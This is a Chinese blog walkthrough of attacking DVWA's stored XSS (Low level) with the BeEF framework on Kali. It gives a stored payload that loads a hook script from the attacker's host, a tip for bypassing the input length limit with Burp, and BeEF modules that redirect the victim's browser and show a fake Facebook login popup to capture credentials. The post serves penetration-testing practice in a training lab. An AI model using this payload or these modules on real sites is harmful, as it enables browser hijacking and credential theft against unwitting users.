DVWA-XSS(Stored)-beef

最新推荐文章于 2024-06-23 21:52:49 发布
最新推荐文章于 2024-06-23 21:52:49 发布
阅读量548 收藏 2
点赞数 16
分类专栏: DVWA 文章标签: xss beEF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/139901255
版权

用Low Level来测试beef的使用

beef配置

如果kali没有beef的,进行下载

apt install beef-xss

使用

beef-xss         # 命令方式启动
beef-xss-stop    # 命令方式关闭 
systemctl start beef-xss.service   #开启beefsystemctl 
stop beef-xss.service     #关闭beefsystemctl 
restart beef-xss.service  #重启beef

打开beef web界面
在这里插入图片描述

beef连接

拿Low Level 的xss漏洞测试
beef hook.js的链接为:http://192.168.20.145:3000/hook.js 145为kali IP。
输入666<script src="http://192.168.20.145:3000/hook.js"></script>
前端message处,前端做了输入长度限制,用burp抓包或者直接在前端界面修改长度限制都可以。
在这里插入图片描述
当客户端打开界面时192.168.20.1主机上线。(打开浏览器界面的主机会上线)
在这里插入图片描述

beef功能

Details:受害者浏览器信息
Logs:记录浏览器操作记录
Commands:向受害者发送指令的模块
下面记录几个功能

  1. 页面重定向
    选中Redirect Browser模块,右侧输入想要跳转到的网址
    在这里插入图片描述
    在这里插入图片描述

  2. 弹窗
    Pretty Theft模块,Dislog Type可以选择不同弹窗,这里用facebook做演示,Custom Log处选kali的IP。
    在这里插入图片描述
    弹窗,输入账号密码。
    在这里插入图片描述
    在beef的history处可以查看账号密码。
    在这里插入图片描述

y06_z
关注
  • 16
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1019
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
跨站脚本攻击--利用BeEF 执行 XSS 攻击
weixin_69826880的博客
06-26 623
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。靶场:kali(攻击者),32位win7(被攻击者)攻击环境:kali安装BEEF,32位win7站点搭建BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。
BeEF-XSS详细使用教程
热门推荐
星落的博客
05-12 4万+
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 L.
使用beef-xss实现DVWA免登
qq_60829702的博客
04-13 253
使用beef-xss,利用dvwa的存储型xss,实现免登等功能
DVWA闯关XSSStored)番外篇
LainWith的博客
08-28 553
为了让实验效果更好一点,这里除了使用靶机(win2008的DVWA)之外,还要使用kali来做进攻者,来收集战果(cookie) 准备工作(手工搭建环境) 1:首先在你的kali上安装web服务 (如果你的web服务无法正常启用,也可以试试升级它) sudo apt install apache2 2:启动web服务 systemctl start apache2.service 3:确认apache2是运行状态 systemctl status apache2.service 4:准备一个文件来
17-xss漏洞
qq_56414082的博客
03-29 555
onload 事件会在页面或图像加载完成后立即发生。onload 通常用于 元素,在页面完全载入后(包括图片、css文件等等。)执行脚本代码。Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。启动BeFF-XSS并登陆进去可以通过命令也可以图形化页面。
第四章-XSS漏洞
guoyuxin3的博客
11-02 942
第四章-XSS漏洞 第一节 XSS跨站脚本分类 1.1 XSS漏洞介绍 ​ 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 ...
利用BeEF执行XSS攻击
m0_70185580的博客
05-31 475
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中,并启动BeEF的hook服务。接下来,需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时,BeEF就会启动并开始执行攻击。
DVWAXSS跨站脚本攻击
sunshine1_0的博客
04-17 633
XSS跨站脚本攻击
DVWA-master.zip
01-04
DVWA-master.zip
DVWA-master.7z 压缩包
09-14
下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下
Web渗透:XSS-DOM-based XSS
WolvenSec的博客
06-21 1022
DOM-based XSS(基于DOM的跨站脚本攻击)是一种XSS攻击类型,其特点是恶意脚本通过操作文档对象模型(DOM)直接在客户端执行,而无需经过服务器的处理。这种攻击主要利用客户端JavaScript代码中的漏洞,使得攻击者能够在浏览器中注入并执行恶意代码。
DVWA-XSS(Stored)-httponly分析
06-23 621
httponly是微软对cookie做的扩展。这个主要是解决用户的cookie可能被盗用的问题。接DVWA的分析,发现其实Impossible的cookie都是设置的httponly=1,samesite=1.这两个参数的意思参考HttpOnly:阻止 JavaScript 通过 Document.cookie 属性访问 cookie。SameSite:控制 cookie 是否随跨站请求一起发送,这样可以在一定程度上防范跨站请求伪造攻击(CSRF)。
5.XSS-反射型(post)利用:获取cookie
愿听风成曲
06-23 204
需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post型链接上;将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件。文件路径:\pikachu\pkxss\xcookie\post.html。在pkxss平台直接获取用户信息。用户误以为是正常网站去访问。基于IP地址配置文件。
XSS跨站脚本攻击对网站有哪些危害
weixin_68778384的博客
06-19 594
XSS跨站脚本攻击是一种典型的Web程序漏洞利用攻击。攻击者利用Web程序对用户输入检查不足的漏洞,将可执行恶意脚本注入网站或Web应用。当用户访问这些被注入恶意脚本的网页时,恶意脚本会在用户的浏览器中执行,从而达到窃取用户个人数据、弹出广告、篡改网页内容等攻击目的。为了防范XSS跨站脚本攻击,网站开发者需要采取一系列的安全措施,如对用户输入进行严格的验证和过滤、设置安全的HTTP响应头部、使用安全的编码实践等。同时,定期更新和打补丁也是防止新发现的安全漏洞被利用的重要手段。
XSS跨站攻击漏洞
zhuge_long的专栏
06-23 1180
xss全称为:Cross Site Scripting,指跨站攻击脚本,XSS漏洞发生在前端,攻击的是浏览器的解析引擎,XSS就是让攻击者的JavaScript代码在受害者的浏览器上执行。XSS攻击者的目的就是寻找具有XSS漏洞的网页,让受害者在不知情的情况下,在有XSS漏洞的网页上执行攻击者的JavaScript代码。XSS是提前埋伏好漏洞陷阱,等着受害者上钩。既然攻击者是执行JavaScript代码,所以攻击的语句应该能让JavaScript运行。第一种 反射型。
机器学习作业-基于python实现的垃圾邮件分类源码(高分项目)
06-27
<项目介绍> 机器学习作业-基于python实现的垃圾邮件分类源码(高分项目) - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
Dijkstra算法:探索最短路径的数学之美.pdf
最新发布
06-27
Dijkstra算法,全名为Dijkstra's Shortest Path Algorithm,是一种用于寻找加权图中最短路径的算法。它由荷兰计算机科学家Edsger W. Dijkstra在1959年提出,并迅速成为图论和网络理论中最重要的算法之一。本文将探讨Dijkstra算法的起源、原理、应用以及它在解决实际问题中的重要性。 一、Dijkstra算法的起源 Dijkstra算法最初是为了解决荷兰阿姆斯特丹的电话交换网络中的路径规划问题而开发的。在那个时代,电话网络的规模迅速扩大,传统的手动路径规划方法已经无法满足需求。Dijkstra意识到,通过数学方法可以高效地解决这类问题,于是他开始着手研究并最终提出了Dijkstra算法。这个算法不仅在电话网络中得到了应用,而且很快在交通、物流、计算机网络等众多领域展现了其强大的实用价值。
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过在DOM中注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [houkc.github.io:HouKC的博客](https://download.csdn.net/download/weixin_42157567/18459500)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [DVWA-XSS(DOM)](https://blog.csdn.net/weixin_44866139/article/details/104101228)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值